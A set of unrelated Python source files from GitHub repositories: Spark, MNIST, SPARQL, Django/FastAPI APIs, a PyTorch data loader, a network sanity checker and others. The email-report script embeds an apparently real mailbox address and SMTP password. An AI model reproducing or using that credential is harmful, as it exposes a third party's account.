__get_class(clazz):\n \"\"\"\n Loads Python class from its name.\n \"\"\"\n parts = clazz.split('.')\n module = \".\".join(parts[:-1])\n m = __import__(module)\n for comp in parts[1:]:\n m = getattr(m, comp)\n return m\n stage_name = java_stage.getClass().getName().replace(\"org.apache.spark\", \"pyspark\")\n stage_name = stage_name.replace(\"com.microsoft.ml.spark\", \"mmlspark\")\n # Generate a default new instance from the stage_name class.\n py_type = __get_class(stage_name)\n if issubclass(py_type, JavaParams):\n # Load information from java_stage to the instance.\n py_stage = py_type()\n py_stage._java_obj = java_stage\n py_stage._resetUid(java_stage.uid())\n py_stage._transfer_params_from_java()\n elif hasattr(py_type, \"_from_java\"):\n py_stage = py_type._from_java(java_stage)\n else:\n raise NotImplementedError(\"This Java stage cannot be loaded into Python currently: %r\"\n % stage_name)\n return py_stage\n\nJavaParams._from_java = _mml_from_java\n","repo_name":"stansuo/BDSE12-Group3","sub_path":"docker/pyspark_lab/main/module/mmlspark/core/serialize/java_params_patch.py","file_name":"java_params_patch.py","file_ext":"py","file_size_in_byte":1391,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"2109175788","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nfile_data = \"mnist_test.csv\"\nhandle_file = open(file_data, \"r\")\ndata = handle_file.readlines()\nhandle_file.close()\n\nsize_row = 28 # height of the image\nsize_col = 28 # width of the image\n\nnum_image = len(data)\ncount = 0 # count for the number of images\n\n#\n# normalize the values of the input data to be [0, 1]\n#\ndef normalize(data):\n\n data_normalized = (data - min(data)) / (max(data) - min(data))\n\n return(data_normalized)\n\n#\n# example of distance function between two vectors x and y\n#\ndef distance(x, y):\n\n d = (x - y) ** 2\n s = np.sum(d)\n # r = np.sqrt(s)\n\n return(s)\n\n#\n# make a matrix each column of which represents an images in a vector form \n#\nlist_image = np.empty((size_row * size_col, num_image), dtype=float)\nlist_label = np.empty(num_image, dtype=int)\n\nfor line in data:\n\n line_data = line.split(',')\n label = line_data[0]\n im_vector = np.asfarray(line_data[1:])\n im_vector = normalize(im_vector)\n\n list_label[count] = label\n list_image[:, count] = im_vector \n\n count += 1\n\n# \n# plot first 150 images out of 10,000 with their labels\n# \nf1 = plt.figure(1)\n\nfor i in range(150):\n\n label = list_label[i]\n im_vector = list_image[:, i]\n im_matrix = im_vector.reshape((size_row, size_col))\n\n plt.subplot(10, 15, i+1)\n plt.title(label)\n plt.imshow(im_matrix, cmap='Greys', interpolation='None')\n\n frame = plt.gca()\n frame.axes.get_xaxis().set_visible(False)\n frame.axes.get_yaxis().set_visible(False)\n\n#plt.show()\n\n#\n# plot the average image of all the images for each digit\n#\nf2 = plt.figure(2)\n\nim_average = np.zeros((size_row * size_col, 10), dtype=float)\nim_count = np.zeros(10, dtype=int)\n\nfor i in range(num_image):\n\n im_average[:, list_label[i]] += list_image[:, i]\n im_count[list_label[i]] += 1\n\nfor i in range(10):\n\n im_average[:, i] /= im_count[i]\n \n plt.subplot(2, 5, i+1)\n plt.title(i)\n plt.imshow(im_average[:,i].reshape((size_row, size_col)), cmap='Greys', interpolation='None') \n\n frame = plt.gca()\n frame.axes.get_xaxis().set_visible(False)\n frame.axes.get_yaxis().set_visible(False)\n\nplt.show()","repo_name":"JinsolHa/assignment01","sub_path":"assignment04.py","file_name":"assignment04.py","file_ext":"py","file_size_in_byte":2243,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"70772267288","text":"# -*- coding: utf-8 -*-\nfrom SPARQLWrapper.SPARQLExceptions import QueryBadFormed\nfrom rdflib import URIRef\n\n\ndef default_to(default=None):\n def outer(f):\n def inner(*args, **kwargs):\n try:\n return f(*args, **kwargs)\n except:\n return default\n return inner\n return outer\n\n\nclass RDFSQueries(object):\n\n def __init__(self, connection, prefixes):\n self.connection = connection\n self.prefixes = prefixes\n\n def query(self, q):\n return self.connection.query(\"\\n\".join(\"prefix %s: <%s>\" % (k, v) for (k, v) in self.prefixes.iteritems())+q)\n\n def insert(self, q):\n return self.connection.insert(\"\\n\".join(\"prefix %s: <%s>\" % (k, v) for (k, v) in self.prefixes.iteritems())+q)\n\n @default_to(None)\n def all(self):\n\n q = \"\"\"\n select ?s ?p ?o\n where\n {\n ?s ?p ?o\n }\n \"\"\"\n\n results = self.query(q)[\"results\"][\"bindings\"]\n return [(x[\"s\"][\"value\"], x[\"p\"][\"value\"], x[\"o\"][\"value\"]) for x in results]\n\n @default_to(None)\n def is_class(self, uri):\n\n q = \"\"\"\n ask\n where\n {\n <%(uri)s> a rdfs:Class\n }\n \"\"\" % {\n \"uri\": uri,\n }\n\n return self.query(q)[\"boolean\"]\n\n @default_to(None)\n def is_property(self, uri):\n\n q = \"\"\"\n ask\n where\n {\n {\n <%(uri)s> a owl:ObjectProperty\n }\n union\n {\n <%(uri)s> a rdf:Property\n }\n }\n \"\"\" % {\n \"uri\": uri,\n }\n\n return self.query(q)[\"boolean\"]\n\n @default_to(None)\n def is_object(self, uri):\n\n return not self.is_class(uri) and not self.is_property(uri)\n\n @default_to(None)\n def exists(self, uri):\n\n q = \"\"\"\n ask\n where\n {\n <%(uri)s> ?p ?o\n }\n \"\"\" % {\n \"uri\": uri,\n }\n\n return self.query(q)[\"boolean\"]\n\n @default_to(None)\n def has_attr(self, object_uri, attr_uri):\n\n q = \"\"\"\n ask\n where\n {\n <%(object_uri)s> <%(attr_uri)s> ?val\n }\n \"\"\" % {\n \"object_uri\": object_uri,\n \"attr_uri\": attr_uri,\n }\n\n return self.query(q)[\"boolean\"]\n\n @default_to([])\n def available_class_properties(self, class_uri):\n\n q = \"\"\"\n select distinct ?prop ?prop_type ?val\n where\n {\n {\n ?prop rdfs:domain <%(class_uri)s> .\n ?prop rdfs:range ?prop_type\n }\n union\n {\n {\n ?prop rdfs:range ?prop_type\n }\n minus\n {\n ?prop rdfs:domain ?tmp\n }\n }\n }\n \"\"\" % {\n \"class_uri\": class_uri,\n }\n\n results = self.query(q)[\"results\"][\"bindings\"]\n return results\n\n @default_to([])\n def available_object_properties(self, object_uri):\n\n q = \"\"\"\n select distinct *\n where\n {\n <%(object_uri)s> ?prop ?val .\n filter (?prop != rdf:type) .\n optional {?val a ?prop_type .}\n }\n \"\"\" % {\n \"object_uri\": object_uri,\n }\n\n results = self.query(q)[\"results\"][\"bindings\"]\n return results\n\n @default_to([])\n def all_resources(self, class_uri):\n\n q = \"\"\"\n select *\n where\n {\n ?obj_uri a <%(type)s>\n }\n \"\"\" % {\n \"type\": class_uri,\n }\n\n results = self.query(q)[\"results\"][\"bindings\"]\n\n return [URIRef(x[\"obj_uri\"][\"value\"]) for x in results]\n\n @default_to(None)\n def get_attr(self, object_uri, attr_uri):\n\n q = \"\"\"\n select *\n where\n {\n <%(object_uri)s> <%(attr_uri)s> ?value\n }\n \"\"\" % {\n \"object_uri\": object_uri,\n \"attr_uri\": attr_uri,\n }\n\n results = self.query(q)[\"results\"][\"bindings\"]\n\n return [x[\"value\"] for x in results]\n\n @default_to([])\n def get_class_objects_by_attr_value(self, class_uri, **kwargs):\n\n q = \"\"\"\n select *\n where\n {\n ?obj a <%(class_uri)s> ;\n %(propeties)s\n }\n \"\"\" % {\n \"class_uri\": class_uri,\n \"propeties\": \";\\n\".join(\"<%s> <%s>\" % (k, v) for (k, v) in kwargs.iteritems()),\n }\n\n results = self.query(q)[\"results\"][\"bindings\"]\n\n return [URIRef(x[\"obj\"][\"value\"]) for x in results]\n\n @default_to([])\n def get_subclasses_of_class(self, class_uri):\n\n q = \"\"\"\n select *\n where\n {\n ?subcl a rdfs:Class ;\n rdfs:subClassOf <%(class_uri)s>\n }\n \"\"\" % {\n \"class_uri\": class_uri,\n }\n\n results = self.query(q)[\"results\"][\"bindings\"]\n\n return [URIRef(x[\"subcl\"][\"value\"]) for x in results]\n\n @default_to(None)\n def get_parent_class(self, object_uri):\n\n q = \"\"\"\n select ?class_uri\n where\n {\n <%(object_uri)s> a ?class_uri\n }\n \"\"\" % {\n \"object_uri\": object_uri,\n }\n\n results = self.query(q)[\"results\"][\"bindings\"]\n\n return [URIRef(x[\"class_uri\"][\"value\"]) for x in results][0]\n\n @default_to([])\n def get_base_classes(self, class_uri):\n q = \"\"\"\n select ?class_uri\n where\n {\n <%(class_uri)s> rdfs:subClassOf ?class_uri\n }\n \"\"\" % {\n \"class_uri\": class_uri,\n }\n\n results = self.query(q)[\"results\"][\"bindings\"]\n\n return [URIRef(x[\"class_uri\"][\"value\"]) for x in results]\n\n @default_to(None)\n def insert_data(self, data):\n q = \"\"\"\n insert data\n {\n %(data)s\n }\n \"\"\" % {\n \"data\": [\"<%s> <%s> <%s> .\" % triplet for triplet in data]\n }\n\n return self.insert(q)[\"boolean\"]\n\n @default_to(None)\n def create_object(self, object_uri, class_uri):\n q = \"\"\"\n insert data\n {\n <%(object_uri)s> a <%(class_uri)s>\n }\n \"\"\" % {\n \"object_uri\": object_uri,\n \"class_uri\": class_uri,\n }\n\n return self.insert(q)[\"boolean\"]\n\n @default_to(None)\n def create_class(self, class_uri):\n q = \"\"\"\n insert data\n {\n <%(class_uri)s> a rdfs:Class\n }\n \"\"\" % {\n \"class_uri\": class_uri,\n }\n\n return self.insert(q)[\"boolean\"]\n\n def delete_data(self, data):\n q = \"\"\"\n delete data\n {\n %(data)s\n }\n \"\"\" % {\n \"data\": [\"<%s> <%s> <%s> .\" % triplet for triplet in data]\n }\n\n return self.insert(q)[\"boolean\"]\n\n @default_to(None)\n def delete_object(self, object_uri, class_uri):\n q = \"\"\"\n dalete data\n {\n <%(object_uri)s> a <%(class_uri)s>\n }\n \"\"\" % {\n \"object_uri\": object_uri,\n \"class_uri\": class_uri,\n }\n\n return self.insert(q)[\"boolean\"]\n\n @default_to(None)\n def delete_class(self, class_uri):\n q = \"\"\"\n delete data\n {\n <%(class_uri)s> a rdfs:Class\n }\n \"\"\" % {\n \"class_uri\": class_uri,\n }\n\n return self.insert(q)[\"boolean\"]","repo_name":"tsouvarev/semantic_objects","sub_path":"SemanticObjects/RDFSQueries.py","file_name":"RDFSQueries.py","file_ext":"py","file_size_in_byte":8476,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"25627665556","text":"\nfrom django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.home, name='home'),\n path('about/', views.about, name='about'),\n path('book/', views.book, name='book'),\n path('menu/', views.menu, name='menu'),\n path('menu_item//', views.menu_detail, name='menu_item'),\n path('api/bookings/', views.BookingList.as_view(), name='booking-list'),\n path('api/registration/', views.Registration.as_view(), name='registration'),\n path('api/menu/', views.MenuList.as_view(), name='menu_list'),\n path('login/' , views.login_view , name='login'),\n path('logout/' , views.logout_view , name='logout'),\n\n\n\n]\n","repo_name":"ho3a11/LittleLemon-API","sub_path":"littleLemon/resturant_api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"20226072930","text":"import re\nfrom django.db.models import Model, get_model\nfrom six import string_types\n\n\ndef camelcase_to_underscore(str):\n # http://djangosnippets.org/snippets/585/\n return re.sub('(((?<=[a-z])[A-Z])|([A-Z](?![A-Z]|$)))', '_\\\\1', str).lower().strip('_')\n\n\ndef resolve_model_string(model_string, default_app=None):\n \"\"\"\n Resolve an 'app_label.model_name' string into an actual model class.\n If a model class is passed in, just return that.\n \"\"\"\n if isinstance(model_string, string_types):\n try:\n app_label, model_name = model_string.split(\".\")\n except ValueError:\n if default_app is not None:\n # If we can't split, assume a model in current app\n app_label = default_app\n model_name = model_string\n else:\n raise ValueError(\"Can not resolve {0!r} into a model. Model names \"\n \"should be in the form app_label.model_name\".format(\n model_string), model_string)\n\n model = get_model(app_label, model_name)\n if not model:\n raise LookupError(\"Can not resolve {0!r} into a model\".format(model_string), model_string)\n return model\n\n elif isinstance(model_string, type) and issubclass(model_string, Model):\n return model_string\n\n else:\n raise LookupError(\"Can not resolve {0!r} into a model\".format(model_string), model_string)\n","repo_name":"Magzhan123/TabysKTS","sub_path":"lib/python2.7/site-packages/wagtail/wagtailcore/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"16769269599","text":"#---------------------------------------------------------------------------------------\r\n#\r\n# Name: Eng. William da Rosa Frohlich\r\n#\r\n# Project: ATHENA I - API\r\n#\r\n# Date: 2021.04.19\r\n#\r\n#---------------------------------------------------------------------------------------\r\n\r\nimport json\r\nimport socket\r\nfrom bottle import Bottle, request\r\n\r\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n\r\nserver = ''\r\nport = 18000\r\naddress = (server, port)\r\n\r\nprint ('socket: created')\r\n\r\nclass API(Bottle):\r\n def __init__(self):\r\n super().__init__()\r\n print(\"api: initiated\")\r\n self.route('/',method='POST', callback=self.send_request)\r\n\r\n def send_request(self):\r\n print(\"api: message received\")\r\n name = request.forms.get('name')\r\n surname = request.forms.get('surname')\r\n msg = (\"START;\" + str(name) + \";\" + str(surname))\r\n\r\n sock.sendto(msg.encode('utf-8'), address)\r\n print(\"api: package sent\")\r\n\r\n if (str(name) == \"\" and str(surname) == \"\"):\r\n return 'Shutting down'\r\n else:\r\n return 'Name: {} {}'.format(name, surname)\r\n\r\n sock.close()\r\n\r\nif __name__ == '__main__':\r\n api = API()\r\n api.run(host='0.0.0.0', port=8080, debug=False)\r\n","repo_name":"wrfrohlich/athena-ii","sub_path":"api/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"75070347286","text":"from torch.utils.data import DataLoader, Dataset\r\nimport os\r\nimport re\r\nfrom lib import max_len, BATCH_SIZE, ws, TEST_BATCH_SIZE\r\nimport torch\r\n\r\n\r\nclass ImdbDataset(Dataset):\r\n def __init__(self, train=True):\r\n self.train_data_path = r'../data/IMDB/train'\r\n self.test_data_path = r'../data/IMDB/test'\r\n data_path = self.train_data_path if train else self.test_data_path\r\n\r\n temp_data_path = [os.path.join(data_path, 'pos'), os.path.join(data_path, 'neg')]\r\n self.total_file_path = [] # all path of data\r\n for path in temp_data_path:\r\n file_names = os.listdir(path)\r\n file_path_list = [os.path.join(path, i) for i in file_names if i.endswith('.txt')]\r\n self.total_file_path.extend(file_path_list)\r\n\r\n def __getitem__(self, index):\r\n file_path = self.total_file_path[index]\r\n label_str = file_path.split('\\\\')[-2]\r\n label = 0 if label_str == 'neg' else 1\r\n tokens = tokenize(open(file_path, encoding='utf-8').read())\r\n return tokens, label\r\n\r\n def __len__(self):\r\n return len(self.total_file_path)\r\n\r\n\r\ndef tokenize(content):\r\n content = re.sub(\"<.*>\", \" \", content)\r\n filters = ['\\t', '\\n', '\\x97', '\\x96', '#', '$', '%', '&', '\"', '\\.', ':']\r\n content = re.sub(\"|\".join(filters), \" \", content)\r\n tokens = [i.strip().lower() for i in content.split(\" \") if i.strip() != '']\r\n return tokens\r\n\r\n\r\ndef collate_fn(batch):\r\n \"\"\"\r\n :param batch: ([tokens, labels], [tokens, labels])\r\n :return: ([token_nums, token_nums], (labels, labels))\r\n \"\"\"\r\n contents, labels = list(zip(*batch))\r\n contents = [ws.transform(i, max_len=max_len) for i in contents]\r\n contents = torch.LongTensor(contents)\r\n labels = torch.LongTensor(labels)\r\n return contents, labels\r\n\r\n\r\ndef get_dataloader(train=True):\r\n imdb_dataset = ImdbDataset(train=train)\r\n batch_size = BATCH_SIZE if train else TEST_BATCH_SIZE\r\n data_loader = DataLoader(imdb_dataset, batch_size=batch_size, shuffle=True, collate_fn=collate_fn)\r\n return data_loader\r\n\r\n\r\nif __name__ == '__main__':\r\n for idx, (x, target) in enumerate(get_dataloader()):\r\n print(idx)\r\n print(x)\r\n print(target)\r\n break\r\n","repo_name":"BugMaker-Boyan/IMDB_LSTM","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":2250,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"12109737760","text":"from http.client import HTTPException\nimport sqlite3\nimport uuid\nfrom fastapi import FastAPI,status\nfrom pydantic import BaseModel\nfrom datetime import date, timedelta\nimport redis\nimport contextlib\n\napp = FastAPI()\n\n#service to retrieve top 10 users by number of wins\n@app.get(\"/api/stats/topwinners\",status_code=status.HTTP_200_OK)\nasync def topWinners():\n\n redisClient = redis.StrictRedis(host='localhost', port=6379, db=0)\n print(redisClient.zcard(\"winners\"))\n return redisClient.zrange(\"winners\", 0, 9, desc=True, withscores=False)\n\n#service to retrieve top 10 users by longest streak\n@app.get(\"/api/stats/topstreaks\",status_code=status.HTTP_200_OK)\nasync def topStreaks():\n\n redisClient = redis.StrictRedis(host='localhost', port=6379, db=0)\n print(redisClient.zcard(\"longestStreaks\"))\n return redisClient.zrange(\"longestStreaks\", 0, 9, desc=True, withscores=False)\n\n\n#Models for Statistics API\nclass Guesses(BaseModel):\n g1: int\n g2: int\n g3: int\n g4: int\n g5: int\n g6: int\n fail: int\n\nclass Statistics(BaseModel):\n currentStreak: int\n maxStreak: int\n guesses: Guesses\n winPercentage: float\n gamesPlayed: int\n gamesWon: int\n averageGuesses: int\n\nclass Game(BaseModel):\n userId: int\n gameId: int\n finished: str\n guesses: int\n won: bool\n\n#service to post the win or loss of a game, along with timestamp and number of guesses\n@app.post(\"/api/game/result\")\nasync def postGameResult(game: Game):\n try:\n print(\"try\")\n sqlite3.register_converter('GUID', lambda b: uuid.UUID(bytes_le=b))\n sqlite3.register_adapter(uuid.UUID, lambda u: u.bytes_le)\n\n #connection to users shard\n users_connection = sqlite3.connect(\"./shard/users.db\", detect_types=sqlite3.PARSE_DECLTYPES)\n users_cursor = users_connection.cursor()\n\n gameShardNum = 0\n print(gameShardNum)\n users = users_cursor.execute(\"select * from users\").fetchall()\n if users is not None and len(users):\n for u in users:\n if(str(u[1])==str(game.userId)):\n gameShardNum = (int(u[0]) % 3) + 1\n break\n print(gameShardNum)\n gamesdb_dict ={}\n\n gamesdb_dict = {\n 1: \"./shard/games1.db\",\n 2: \"./shard/games2.db\",\n 3: \"./shard/games3.db\",\n }\n\n gamesdb = gamesdb_dict[gameShardNum]\n print(gamesdb)\n \n with contextlib.closing(sqlite3.connect(gamesdb)) as db:\n x = db.execute(\"INSERT INTO games(user_id, game_id, finished, guesses, won) VALUES(?, ?, ?, ?, ?)\",\n [game.userId, game.gameId, game.finished, game.guesses, game.won])\n print(x)\n db.commit()\n db.close()\n \n except sqlite3.IntegrityError:\n print(\"Error!!\")\n\n#service to retrieve statistics for a user\n@app.get(\"/api/stats/statistics/{userid}\", status_code=status.HTTP_200_OK)\nasync def statistics(userid):\n try:\n sqlite3.register_converter('GUID', lambda b: uuid.UUID(bytes_le=b))\n sqlite3.register_adapter(uuid.UUID, lambda u: u.bytes_le)\n gamesPlayed = 0\n gamesWon = 0\n fail =0\n avgGuesses = 0\n currentStreak = 0\n maxStreak = 0\n guesses = {1:0, 2:0, 3:0, 4:0, 5:0, 6:0}\n\n #connection to users shard\n users_connection = sqlite3.connect(\"./shard/users.db\", detect_types=sqlite3.PARSE_DECLTYPES)\n users_cursor = users_connection.cursor()\n\n gameShardNum = 0\n\n users = users_cursor.execute(\"select * from users\").fetchall()\n if users is not None and len(users):\n for u in users:\n if(str(u[1])==str(userid)):\n gameShardNum = (int(u[0]) % 3) + 1\n break\n #print(gameShardNum)\n gamesdb_dict ={}\n\n gamesdb_dict = {\n 1: \"./shard/games1.db\",\n 2: \"./shard/games2.db\",\n 3: \"./shard/games3.db\",\n }\n\n gamesdb = gamesdb_dict[gameShardNum]\n #print(gamesdb)\n \n #connection to the corresponding games shard based on the shard num\n conn_games = sqlite3.connect(gamesdb, detect_types=sqlite3.PARSE_DECLTYPES)\n cursor_games = conn_games.cursor()\n\n gamesResult = cursor_games.execute(\"SELECT guesses,won from games where user_id=?\",[userid]).fetchall()\n #print(gamesResult)\n \n if gamesResult is not None:\n gamesPlayed = len(gamesResult)\n print(gamesPlayed)\n for g in gamesResult:\n guesses[g[0]]+=1\n if g[1] == 0:\n fail+=1\n i = 1\n sumOfGuesses = 0\n while i <= 6:\n sumOfGuesses += i*guesses[i]\n i +=1\n\n winsResult = cursor_games.execute(\"SELECT * from wins where user_id = ?\",[userid]).fetchall()\n if winsResult is not None and len(winsResult)>0:\n gamesWon = winsResult[0][1]\n\n if gamesPlayed == 0:\n winPercentage = 0\n else:\n winPercentage = (gamesWon/gamesPlayed)*100\n avgGuesses = round(sumOfGuesses/gamesPlayed)\n\n streakResult = cursor_games.execute(\"SELECT streak from streaks where user_id = ? order by ending desc\",[userid]).fetchall()\n\n if (streakResult is not None and len(streakResult)>0 and streakResult[0] is not None and len(streakResult[0])>0):\n currentStreak = streakResult[0][0]\n else:\n currentStreak = 0\n\n maxStreakResult = cursor_games.execute(\"SELECT MAX(streak) from streaks where user_id = ? order by ending desc\",[userid]).fetchall()\n if (maxStreakResult is not None and len(maxStreakResult)>0):\n if len(maxStreakResult[0])!=0 and maxStreakResult[0][0] is not None:\n maxStreak = maxStreakResult[0][0]\n else:\n maxStreak = 0\n\n g = Guesses(g1=guesses[1], g2=guesses[2], g3=guesses[3], g4=guesses[4], g5=guesses[5], g6=guesses[6], fail=fail ) \n stat = Statistics(currentStreak=currentStreak, maxStreak=maxStreak, guesses=g, winPercentage=round(winPercentage, 2), gamesPlayed=gamesPlayed, gamesWon=gamesWon, averageGuesses=avgGuesses)\n \n cursor_games.close()\n conn_games.close()\n users_cursor.close()\n users_connection.close()\n\n except:\n print(\"Error!!\")\n\n return stat","repo_name":"gjoshi171/Wordle-Part3-NoSQL-and-Materializing-Views","sub_path":"statistics.py","file_name":"statistics.py","file_ext":"py","file_size_in_byte":6513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5121088089","text":"# -*- coding:utf-8 -*-\n# user:Liukang\nimport os.path\nimport smtplib\nimport time\nfrom HTMLTestRunner import HTMLTestRunner\nfrom email.header import Header\nfrom email.mime.text import MIMEText\n\n\nclass Report(object):\n\n # 邮件发送最新HTML测试报告\n def report_email(suite, title):\n # 获取当前时间\n now = time.strftime(\"%Y-%m-%d %H-%M-%S\", time.localtime())\n # 报告存放路径\n report_path = os.getcwd() + '/test_report/'\n # 执行测试集、生成测试报告\n HTMLFile = report_path + now + 'api.html'\n # with open(HTMLFile,'wb') as fp:\n try:\n fp = open(HTMLFile, 'wb')\n runner = HTMLTestRunner(stream=fp, title=title, description=u\"用例执行情况\")\n runner.run(suite)\n fp.close()\n print(\"报告已生成:%s\" % HTMLFile)\n\n # 获取最新报告\n try:\n lists = os.listdir(report_path)\n lists.sort(key=lambda fn: os.path.getatime(report_path + \"\\\\\" + fn))\n file_new = os.path.join(report_path, lists[-1])\n print(\"已获取最新测试报告:\" + file_new)\n # 发送邮件\n try:\n f = open(file_new, 'rb')\n mail_body = f.read()\n f.close()\n msg = MIMEText(mail_body, 'html', 'utf-8')\n rq = time.strftime('%Y%m%d%H%M', time.localtime(time.time()))\n msg['Subject'] = Header(\"自动化测试报告\" + rq, 'utf-8')\n\n try:\n smtp = smtplib.SMTP()\n smtp.connect(\"smtp.qq.com\")\n smtp.login(\"1661289226@qq.com\", \"fztwjhnxyveydgad\")\n smtp.sendmail(\"1661289226@qq.com\", \"1445034070@qq.com\", msg.as_string())\n smtp.quit()\n print('自动化测试报告发送成功 !')\n except Exception as e:\n print(\"测试报告发送失败 !\" + e)\n return e\n except Exception as e:\n print(e)\n return e\n except Exception as e:\n print(\"最新报告获取失败 !\" + e)\n return e\n except Exception as e:\n print(\"报告生成失败 !\" + e)\n return e\n\n","repo_name":"18271761651/selenium","sub_path":"common/send_report.py","file_name":"send_report.py","file_ext":"py","file_size_in_byte":2432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12172409469","text":"import os\nimport shutil\n\n\ndef gather_images(source, destination):\n '''source = \"Croissance HUVEC transfectées 29Oct20\"\n destination = \"Croissance_29_Oct20_gathered\"'''\n\n try:\n os.mkdir(destination)\n print(\"Directory \" , destination , \" Created \") \n except FileExistsError:\n print(\"Directory \" , destination , \" already exists so it is reseted\")\n previous_images = os.listdir(destination)\n for prevIm in previous_images : os.remove(destination+'/'+prevIm)\n \n\n\n contenu = os.listdir(source + '/')\n jours = []\n\n for element in contenu : \n if os.path.isdir(source + '/' + element) : jours.append(element)#les jours ne sont que les dossiers \n\n #print(jours)\n\n\n for jour in jours :\n source_jour = source + '/' + jour \n\n contenuJour = os.listdir(source_jour)#c'est la liste de tout ce qu'il y a dans un dossier jour__\n champs = []\n for contenu in contenuJour: \n if os.path.isdir(source_jour + '/' + contenu) : champs.append(contenu)\n \n \n for champ in champs :\n source_champ = source_jour + '/' + champ\n\n contenuChamp = os.listdir(source_champ)\n temps = []\n\n for contenu in contenuChamp: \n if os.path.isdir(source_champ + '/' + contenu) : temps.append(contenu)\n\n #if jour == jours[1] and champ == champs[0] : print(temps)\n\n for temp in temps : \n source_temp = source_champ + '/' + temp\n #if jour == jours[1] and champ == champs[1] : print(os.listdir(source_temp)[0])\n try : \n image = os.listdir(source_temp)[0]\n source_image = source_temp + '/' + image\n #if jour == jours[1] and champ == champs[1] and temp == temps[2] : print(source_image)\n #print(source_image)\n\n dest = destination+'/' + jour + '_' + champ + '_' + temp + os.path.splitext(image)[1]\n shutil.copyfile(source_image,dest)\n\n except : print(f\"NO IMAGE AT {source_image}\")\n print(\"Image transfering finished\")\n\n","repo_name":"elithb/Cell_Detection","sub_path":"image_gatherer.py","file_name":"image_gatherer.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25405183898","text":"from __future__ import with_statement\n\nfrom os import listdir\nfrom os.path import join\nimport subprocess\n\nfrom ufwi_rpcd.common.process import createProcess\nfrom ufwi_rpcd.common.process import waitProcess\n\nIFDOWN_D = \"/etc/network/if-down.d\"\nIFUP_D = \"/etc/network/if-up.d\"\n\nSAFE_IFUP_D_FILES = (\n 'ip',\n 'openssh-server'\n )\n\n\ndef check_dangerous_files():\n #check IFDOWN_D is empty\n ifdown_dangerous_files = listdir(IFDOWN_D)\n\n ifup_dangerous_files = listdir(IFUP_D)\n #check IFDOWN_D contains only SAFE_IFUP_D_FILES:\n for safe_file in SAFE_IFUP_D_FILES:\n if safe_file in ifup_dangerous_files:\n ifup_dangerous_files.remove(safe_file)\n\n dangerous_files = tuple(\n (\n join(IFDOWN_D, file)\n for file in ifdown_dangerous_files\n )\n ) + tuple(\n (\n join(IFUP_D, file)\n for file in ifup_dangerous_files\n )\n )\n\n return dangerous_files\n\ndef warn_dangerous_files(logger):\n dangerous_files = check_dangerous_files()\n if dangerous_files:\n logger.critical(\"WARNING, the following files were detected \"\n \"on your system, and they are potentially harmful. \"\n \"You might want to delete/save them:\")\n for file in dangerous_files:\n logger.critical(' * %s' % file)\n\ndef check_if_up(ifname):\n \"\"\"\n Uses the content of /sys/class/net/lo/operstate\n @type ifname: an interface system name\n @return: bool, str\n @raise IOError: if /sys/class/net/$ifname$/operstate' does not exist\n \"\"\"\n #here, the exception:\n with open('/sys/class/net/%s/operstate' % ifname, 'r') as fd:\n state = fd.read().strip()\n\n if state == 'down':\n return False, 'Read %s state: \"%s\".' % (ifname, state)\n elif state == 'up':\n return True, 'Read %s state: \"%s\".' % (ifname, state)\n elif state == 'unknown' and ifname == 'lo':\n return True, 'Read %s state: \"%s\"' % (ifname, state)\n\n return False, 'Unknown state for interface %s.' % (ifname, state)\n\n\ndef check_and_correct_lo(logger):\n \"\"\"\n @type logger: logging.Logger\n @return: bool\n \"\"\"\n try:\n ok, msg = check_if_up('lo')\n except IOError:\n return False\n\n if ok:\n return True\n logger.critical(\"%s - Bringing lo up...\" % msg)\n process = createProcess(\n logger,\n '/sbin/ip l set lo up'.split(),\n stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT,\n env={}\n )\n retcode = waitProcess(logger, process, 120)\n\n try:\n re_ok, re_msg = check_if_up('lo')\n except IOError:\n #FIXME: if we go here, what happened ? Shouldn't we have the problem at the beginning of the function\n return False\n if re_ok:\n logger.info(\"Could bring lo up!\")\n return True\n\n logger.critical(\"Could NOT bring lo up!\")\n return False\n\n","repo_name":"maximerobin/Ufwi","sub_path":"etude_de_base/ufwi-administration-suite-ufwi-conf/ufwi_conf/backend/components/network/sanity.py","file_name":"sanity.py","file_ext":"py","file_size_in_byte":2893,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"31"} +{"seq_id":"10193258112","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def maxDepth(self, root: Optional[TreeNode]) -> int:\n if root == None:\n return 0 \n \n \n if root.left == None and root.right == None:\n return 1\n else:\n ldepth = 0\n if root.left is not None:\n ldepth = self.maxDepth(root.left)\n ldepth += 1\n\n rdepth = 0\n if root.right is not None:\n rdepth = self.maxDepth(root.right)\n rdepth += 1\n \n return max(ldepth,rdepth)\n 